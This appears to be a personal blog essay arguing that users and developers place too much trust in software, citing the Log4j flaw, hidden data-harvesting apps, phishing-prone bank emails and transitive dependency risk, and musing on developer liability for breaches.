The Wall Street journal today just posted an article Apps with Hidden Data Harvesting Software are Banned by Google, which is just one of many. I’m not even going to say it’s more egregious than many.
I worked on cybersecurity compliance for the nuclear power industry for a few years. I wasn’t doing the cyber protection itself (I’m not a security administrator, computer or network) but rather the software that enabled them to track all the details per NEI-0809. I learned a lot more than I ever wanted to know about security, and that includes having worked with classified data (oddly, as a site adminstrator) in USAF and having security certifications.
We want to trust; we want to believe that what we download, what we draw in from public repositories, even what we buy, is secure. It’s not.
True malicious code is the exception (otherwise, we’d all be best off going back to plain old telephone service landlines and calculators). There are bad actors and there are those who fight them. Malicious code and active attackers are a known threat.
No less dangerous though are the security risks from honest but mediocre code.
As a recent example that many will know about, the Log4j issue was heavily reported (US Cybersecurity & Infrastructure Security Agency report):
This wasn’t a coding bug per-se, but was caused by the developers trusting JNDI resources. Most developers and users grant DNS has the same implicit trust.
Thinking about adversarial situations is not what most people do. In the real world, the confidence man takes advantage of this.
Even when the company is honest in what they do, such as a bank or credit card company, they help teach people to extend trust in dangerous ways. For instance, I’ve received emails from my bank, from some of my credit card companies, and even some of my fintech services, that provide links for me to click that bring me to my online account.
That’s terrible! If you train users to click and then login to links in your emails, you set them up for phishing attacks!
So, our social and emotional trust is being used against us:
- By malicious actors
- By honest but imperfect developers
- By those trying to make things easier for us
Our trust is being abused constantly.
Perhaps the most pernicious problem … trust is transitive. Our clients trust us, and we trust Log4j. Our failure to protect against a Log4j bug means they also trust Log4j, even without knowing it.
As painful as it is to have my own errors cause harm … I’m the one that the client’s see when someone else’s errors that I brought into the system cause harm.
I’ve written about reducing dependencies in any given section of code for developer load in my article on the pragmatics. I actually refused to address the transitive security risks there because even without security risks there are costs to all drawn in dependencies. Adding in security risks and it gets much harder.
We’re not going to “go back” to the old days. We wouldn’t want to. But, as we advance into the future, such as the Internet of Things, especially each with a 5G connection, and the Metaverse, where everything is distributed between unknown actors, we’re not making our systems more trustworthy and robust.
We’re increasing our risks.
In nature, living organisms each carry their own immune system. They each have their own power generation and distribution system (digestive system, muscles or equivalents). They each have a unique set of components — similar, but not the same. In nature, even a terrible pandemic rarely kills every individual.
But in our modern technology, we interlink everything with shared parts. We do it for “efficiency at scale.” For “cost benefit.” What about the costs of breaches of trust?
In the event that any of our nations decide that developers are legally and financially liable for security breaches caused by their deliverables (as pharmaceuticals are for biological side-effects), that would put a cost on breaches of trust.
Would any of us still be willing to ship the current software today in such a regulatory/legal world?
Keep the Light,